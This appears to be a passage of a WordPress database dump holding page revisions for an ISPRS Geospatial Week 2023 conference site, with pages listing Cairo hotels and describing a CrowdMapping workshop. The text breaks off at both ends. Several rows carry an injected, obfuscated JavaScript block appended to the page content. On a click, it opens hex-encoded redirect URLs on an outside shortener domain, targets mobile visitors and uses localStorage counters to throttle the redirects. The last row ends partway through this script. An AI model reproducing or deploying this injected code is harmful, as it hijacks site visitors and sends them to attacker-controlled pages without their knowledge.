function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-09 03:49:50','2022-10-09 03:49:50','',2167,'https://gsw2023.com/?p=2695',0,'revision','',0),
(2696,1,'2022-10-09 03:51:32','2022-10-09 03:51:32','<p>[vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a>Other Hotels Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\"]</p>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2022-10-09 03:51:32','2022-10-09 03:51:32','',2685,'https://gsw2023.com/?p=2696',0,'revision','',0),
(2697,1,'2022-10-09 04:02:09','2022-10-09 04:02:09','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2699\" img_size=\"1000x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\">CrowdMapping: Crowdsourcing for Global Mapping</span></h5>\r\n<h5></h5>\r\n<h5></h5>\r\n<p>&nbsp;</p>\r\n<h5></h5>\r\n<h5 style=\"text-align: justify; color: black;\">Crowdsourcing techniques have been widely employed to detect and map land surface dynamics, such as land use and land cover, human settlements, buildings, and crisis situations. These techniques are applied at regional and global scales to complement or substitute other specialized and expensive physical sensors aboard satellites, unmanned aerial vehicles, ground vehicles, and robots. This workshop will provide a forum for discussion of recent advances in crowdsourcing techniques for mapping global environments. Our goal is to bring together experts in global mapping who utilize Volunteered Geographic Information (VGI), User-Generated-Content, and Citizen Science to establish a common and sustainable ecosystem that will consolidate multi-disciplinary efforts from researchers and practitioners. CrowdMapping will be a key component of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology and Maritime Transport, alongside other related workshops. Since this will be the first joint workshop of the organising team, we propose to allocate a single whole day of the ISPRS Geospatial Week for oral presentations, poster sessions, and hands-on demos aligned to the CrowdMapping context.</h5>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\r\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\r\n<p>[/vc_column_text][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"45\"][vc_separator][vc_row_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_size=\"0\"]</p>\r\n<h5 style=\"text-align:justify; color:red;\" &gt;<strong>Themes of event:</strong></p>\r\n<h6><strong>⦁ Land use and land cover mapping using crowdsourcing</strong><br />\r\n<strong>⦁ Fusion of multi-source data for land use monitoring and change detection</strong><br />\r\n<strong>⦁ Integration of VGI and deep learning</strong><br />\r\n<strong>⦁ Generation and extraction of high-quality training data from VGI</strong><br />\r\n<strong>⦁ Satellite image analysis using crowdsourcing data for collaborative mapping </strong><br />\r\n<strong>⦁ Measures, indicators, and evaluation methods of VGI quality</strong><br />\r\n<strong>⦁ 3D building reconstruction from VGI data</strong><br />\r\n<strong>⦁ Crowdsourcing-based indoor mapping</strong><br />\r\n<strong>⦁ Building semantic enrichment using social media data</strong><br />\r\n<strong>⦁ OpenStreetMap enrichment</strong><br />\r\n<strong>⦁ Crisis mapping using web enabled crowdsourcing</strong><br />\r\n<strong>⦁ Case study of VGI and crowdsourcing disaster relief</strong><br />\r\n<strong>⦁ Automatically mapping human settlements in rural areas</strong><br />\r\n<strong>⦁ Humanitarian cartography using OpenStreetMap</strong><br />\r\n<strong>⦁ Unified platform for earth observation using Citizen Science</strong><br />\r\n<strong>⦁ Extraction of urban functional regions from location-enabled social networks</strong></h6>\r\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_size=\"0\"]</p>\r\n<h5 style=\"text-align: justify; color: red;\"><strong>Scientific Committee:</strong></h5>\r\n<h6><strong>⦁ João Porto de Albuquerque, University of Glasgow, UK</strong><br />\r\n<strong>⦁ Jamal Jokar Arsanjani, Aalborg University, Denmark</strong><br />\r\n<strong>⦁ Ana Basiri, University of Glasgow, UK</strong><br />\r\n<strong>⦁ Lucy Bastin, Aston University, UK</strong><br />\r\n<strong>⦁ Alexander Brenning, Friedrich Schiller University, Germany</strong><br />\r\n<strong>⦁ Cidália Fonte, Universidade de Coimbra, Portugal</strong><br />\r\n<strong>⦁ Jukka Krisp, Universität Augsburg, Germany</strong><br />\r\n<strong>⦁ Pascal Neis, University of Applied Sciences Mainz, Germany</strong><br />\r\n<strong>⦁ Tessio Novack, University of Warwick, UK</strong><br />\r\n<strong>⦁ Bernd Resch, University of Salzburg, Austria</strong><br />\r\n<strong>⦁ Hansi Senaratne, German Aerospace Center(DLR), Germany</strong><br />\r\n<strong>⦁ Bisheng Yang, Wuhan University, China</strong><br />\r\n<strong>⦁ Xiaoxiang Zhu, German Aerospace Center(DLR), Germany</strong><br />\r\n<strong>⦁ Alexlander Zipf, Universität Heidelberg, Germany</strong></h6>\r\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\r\n<h5 style=\"text-align: justify; color: red;\"><strong>Supporting ISPRS Working Groups:</strong></h5>\r\n<h6><strong>⦁ WG I/4: LiDAR, Laser Altimetry and Sensor Integration</strong></h6>\r\n<h6>\r\n<strong>⦁ WG VI/4: Data management for Spatial Scenarios</strong></h6>\r\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 